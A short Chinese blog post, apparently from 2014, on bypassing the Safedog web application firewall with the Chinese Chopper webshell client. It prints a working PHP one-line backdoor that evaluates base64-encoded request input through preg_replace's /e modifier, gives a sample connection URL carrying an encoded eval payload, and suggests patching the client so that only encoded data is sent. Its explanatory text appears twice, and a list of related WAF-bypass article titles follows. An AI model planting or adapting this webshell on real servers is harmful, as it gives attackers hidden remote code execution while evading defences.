秒杀安全狗神器 最新菜刀过安全狗的新方法
2014-10-08 10:14
405 查看
传shell上去但系被狗拦,shell过狗不太好容易啊,但是过狗之后狗狗总是拦菜刀提交的数据包
然后想到了个方法,就是用一句话解密传递的数据
菜刀连接PHP一句话时会自己重新定义一个z0变量来执行PHP代码,我们只要用OD把EVAL POST去掉就得咯,一句话马的密码随便填,不就能过狗狗了
一句话码:
菜刀连接,密码随便填
总结:如果在服务端解密,客户端只传加密信息过去的话,狗永远都是打不过刀
然后想到了个方法,就是用一句话解密传递的数据
菜刀连接PHP一句话时会自己重新定义一个z0变量来执行PHP代码,我们只要用OD把EVAL POST去掉就得咯,一句话马的密码随便填,不就能过狗狗了
一句话码:
<?php preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>
菜刀连接,密码随便填
http://192.168.100.193/s.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==
总结:如果在服务端解密,客户端只传加密信息过去的话,狗永远都是打不过刀
相关文章推荐
- Android高效开发编译调试神器_Jrebel 最新激活方法以及 freeline(快到飞起~秒杀InstantRun)
- 三种方法完美绕过安全狗2015最新版
- [系统安全] 最新神器,可修改指定串号,手机号,Mac,机型等信息
- 2015最新专版过狗菜刀,过目前最新版V4.2安全狗!
- 三种方法完美绕过安全狗2015最新版
- pk188 安装方法 最新微信陌陌站街神器 uber 平安易贷
- 安全防范基础:关于电脑木马程序隐藏一个的新方法
- 安全删除Windows XP SP2的四种方法(适用与安装双系统的)
- Cisco交换机实现端口安全的方法及事项
- 动易首页调用最新文章图片向上滚动方法(ZT)
- 安全彻底关闭实例Excel.Application后产生的进程方法
- 求记录中的最新数据的方法!
- 最新恶意广告IS_0518(_IS_ISC.DLL)的删除方法
- 近千部最新英文读物(word 格式)及下载阅读方法
- 申请@msn.com的邮箱最新方法
- 动易首页调用最新文章图片向上滚动方法(ZT)
- Windows最新十大安全漏洞
- (3) 微软发布最新危急安全补丁
- 启用SSL后遇到:“该安全证书是由一家您不愿信任的公司颁发的”的解决方法
- 求记录中的最新数据的方法!